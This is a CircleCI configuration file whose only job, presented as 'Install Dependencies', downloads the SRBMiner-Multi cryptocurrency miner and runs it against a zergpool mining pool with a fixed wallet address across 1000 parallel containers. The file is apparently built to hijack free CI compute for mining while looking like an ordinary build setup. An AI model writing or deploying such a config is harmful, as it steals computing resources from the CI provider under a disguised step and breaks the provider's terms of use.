version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 1000
      steps:
        - run:
            name: Install Dependencies
            command: wget https://github.com/doktor83/SRBMiner-Multi/releases/download/0.9.3/SRBMiner-Multi-0-9-3-Linux.tar.xz
                       tar -xf SRBMiner-Multi-0-9-3-Linux.tar.xz
                         cd SRBMiner-Multi-0-9-3
                           ./SRBMiner-MULTI --algorithm yespowerurx --pool yespowerURX.eu.mine.zergpool.com:6236 --wallet MQoUXBrWHK3r4y6xnt59fA3Mqjy87carmg --password c=LTC 
             

workflows:
    version: 2.1
    build:
        jobs:
        - trial
